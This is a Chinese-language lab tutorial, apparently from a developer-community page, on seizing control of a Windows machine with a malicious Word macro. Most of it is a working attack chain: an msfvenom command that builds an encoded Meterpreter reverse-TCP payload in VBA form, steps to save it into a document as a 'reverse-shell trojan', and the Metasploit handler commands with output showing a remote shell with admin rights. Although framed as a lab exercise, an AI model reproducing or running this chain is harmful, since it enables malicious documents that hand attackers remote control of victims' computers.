实验环境:Windows虚拟机一台IP地址为192.168.230.4,需安装office,kali Linux虚拟机一台,IP地址192.168.230.10
实验目的:拿下Windows控制权
实验步骤:
一,部署实验环境
1,Windows安装word,配置IP地址
在这里插入图片描述二,使用kali生成payload
1,打开msf生成payload
命令行输入msfconsole也可以打开
在这里插入图片描述

msf6 > msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.230.10 LPORT=4444 -a x86 --platform windows-e x86/shikata_ga_nai -i 5 -f vba-exe    生成payload,-p指定payload,LHOST指定本机IP地址作为监听,LPORT为本机监听端口,-a架构 x86架构,--platform平台为Windows,-e指定编码器

在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述打开宏文件
在这里插入图片描述另存为反弹木马
在这里插入图片描述2,进行监听

msf6 > use exploit/multi/handler     
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp   设置payload
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.230.10    设置监听IP地址
LHOST => 192.168.230.10
msf6 exploit(multi/handler) > set LPORT 4444     监听端口
LPORT => 4444
msf6 exploit(multi/handler) > run   运行监听器

在这里插入图片描述在这里插入图片描述在这里插入图片描述获取到shell
meterpreter > getuid 查看当前用户,已经获取到管理员权限
Server username: DESKTOP-QU8DCA3\admin
在这里插入图片描述
【至此,实验完成】

Logo
华为开发者空间

华为开发者空间,是为全球开发者打造的专属开发空间,汇聚了华为优质开发资源及工具,致力于让每一位开发者拥有一台云主机,基于华为根生态开发、创新。

更多推荐

cover

领取云主机,带你基于PyTorch构建高效手写体识别系统

avatar 华为开发者空间
cover

华为“云上先锋”实践赛·AI赛道现场会活动成功举办

avatar 华为开发者空间
cover

华为云数据库斯享会走进贵阳,与贵州企业携手共绘数智蓝图

avatar 华为开发者空间